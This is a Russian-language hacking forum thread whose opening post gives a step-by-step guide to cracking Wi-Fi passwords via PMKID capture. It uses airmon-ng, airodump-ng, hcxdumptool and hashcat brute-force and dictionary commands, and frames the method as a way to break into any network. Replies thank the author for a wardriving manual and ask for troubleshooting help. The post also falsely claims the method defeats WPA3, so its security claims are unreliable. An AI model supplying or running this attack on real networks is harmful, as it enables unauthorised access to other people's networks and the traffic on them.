Что нового?

 

Новый метод взлома wi-fi

Combat

Знающий
Команда форума
PR-group

Combat

Знающий
Команда форума
PR-group
Регистрация
19 Окт 2018
Сообщения
416
Симпатии
399
Баллы
68
#1
Шалом хацкеры, все мы знаем о протоколе шифрования WPA2, который используется сейчас во всех запароленных точках доступа.

Мало кто из вас знает, что пару месяцев назад Wi-Fi Alliance представил новый протокол шифрования WPA3.

Это не только большой шаг в области безопасности, но еще и новые трудности со взломом.​


Пока протокол шифрования не распространился глобально, мы решили заранее решить вопрос с его взломом. И решили, друзья!

Теперь внимание - наш метод работает не только с новым WPA3 но и с распространенным повсеместно WPA2.

Способ будет актуален для взлома любой сети Wi-Fi прямо здесь и сейчас, а так же на долгое будущее.

Важное преимущество - нам не нужно перехватывать рукопожатие, а соответственно не нужно ждать, пока кто-то подключится к точке.

Приступим:

Все действия статьи буду выполнятся в Debian​


Подготовка

Устанавливаем на нашу машину(возможно уже у кого то есть часть этих инструментов из коробки):

1. airmon-ng + airodump-ng

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



2. hcxdumptool

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



3. hcxpcaptool

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



4. hashcat

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Продолжаем:



  • Первым делом запустим нашу карту в режим монитора.
sudo airmon-ng start wlan0



Имя своего wifi интерфейса можно посмотреть в набрав команду ifconfig (для меня это wlan0).

  • Далее начинаем захват пакетов с помощью утилиты airodump.
sudo airodump-ng wlan0mon

(wlna0mon - интерфейс монитора, который появится в списке ifconfig, после старта первой команды.)

Видим следующее:

715aa6df2056e9d5cc566.jpg

  • Из списка выбираем более или менее устойчивый.
Далее сохраняем его BSSID

echo "98DED0EF7060" > filter.txt

Обратите внимание что BSSID мы записываем без ":"​


Теперь переходим к самому главному, друзья!



  • Первым шагом мы должны получить pmkid точки. Делается это так:
sudo hcxdumptool -o hash -i wlan0mon --filterlist=filter.txt --filtermode=2 --enable_status=1,2

Если вам интересны значения ключей, то вы можете почитать набрав hcxdumptool -h.

Основные --o hash - тут сохранится собственно сам pmkid. --i wlan0mon - интерфейс мониторящей карты. --filterlist - наш сохраненный bssid.

После того как ввели команду видим примерно следующее:

fa7a0ef45abe096e1438f.jpg

Как только увидим надпись

[FOUND PMKID]

Жмем CTRL + C и приступаем к расшифровке.

  • Приведем наш pmkid в удобочитаемый вид для hashcat
sudo hcxpcaptool -z hashtocrack hash

  • Если набрать
cat hashtocrack

  • То получим примерно следующее
ef2115548399c67c69639f04feaeebdb:98ded0ef7060:28565aba7224



  • Далее заряжаем наш Hascat
Мы будем перебирать пароли, состоящие из 8 символов (Брут).

Сделаем мы это следующей командой:

sudo hashcat -m 16800 hashtocrack -a 3 -w 3 '?d?d?d?d?d?d?d?d' --force

'?d?d?d?d?d?d?d?d' - это собственно маска. По маскам можете почитать доки hashcat

  • Команда для перебора по словарю
sudo hashcat -m 16800 hashtocrack wordlist.txt --force



У нас hashcat производит брут с использованием GPU (видеокарты), по маске из 8 цифр (это 10кк паролей), перебирает чуть меньше часа. По словарям тоже очень быстро работает.​
 

BadX

Постоянный участник
ДРУЗЬЯ ФОРУМА

BadX

Постоянный участник
ДРУЗЬЯ ФОРУМА
Регистрация
8 Окт 2018
Сообщения
114
Симпатии
84
Баллы
43
#2

DaddyBear

Участник
ДРУЗЬЯ ФОРУМА

DaddyBear

Участник
ДРУЗЬЯ ФОРУМА
Регистрация
11 Июн 2018
Сообщения
23
Симпатии
3
Баллы
8
#3
Как раз аппаратурку прикупил для вардрайвинга, респект за мануальчик)
 

tereza999

Новичок

tereza999

Новичок
Регистрация
7 Мар 2019
Сообщения
3
Симпатии
0
Баллы
1
#4
копипаст
 

Lola

Участник

Lola

Участник
Регистрация
12 Дек 2018
Сообщения
42
Симпатии
14
Баллы
13
#5
Только встретились с линухом, туплю, подскажите, после ввода cat hashtocrack, пишет
cat: hashtocrack: No such file or directory
Что я делаю не так?